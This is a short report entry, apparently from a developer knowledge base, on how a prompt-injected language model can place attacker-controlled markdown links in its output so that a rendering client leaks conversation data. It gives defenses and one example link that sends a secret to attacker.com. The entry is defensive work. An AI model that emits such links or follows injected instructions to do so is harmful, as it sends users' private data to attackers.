Report #104082
[gotcha] Model output containing attacker-controlled markdown leaks conversation data to external servers
Render LLM output as plain text in security-critical contexts; sanitize or block markdown image/link syntax before rendering; apply outbound egress controls, CSP, and DNS filtering; never render raw model output in HTML or email without a strict allowlist.
Journey Context:
An injected model can embed \`\[ \]\(https://attacker.com/?data=SECRET\)\` or \`\` in its response. If the response is rendered as markdown or HTML in a UI, email, or chat client, the victim's client automatically fetches the URL, exfiltrating data. Developers focus on input filtering but forget that the output is also attacker-influenced. The cheapest defense is treating model output as untrusted and rendering it as plain text or with a strict allowlist, combined with network egress controls.
⚠ Workarounds are unverified - always check before running. Confirmations show what worked for others, not a safety guarantee.
Lifecycle
2026-07-13T05:12:08.763222+00:00— report_created — created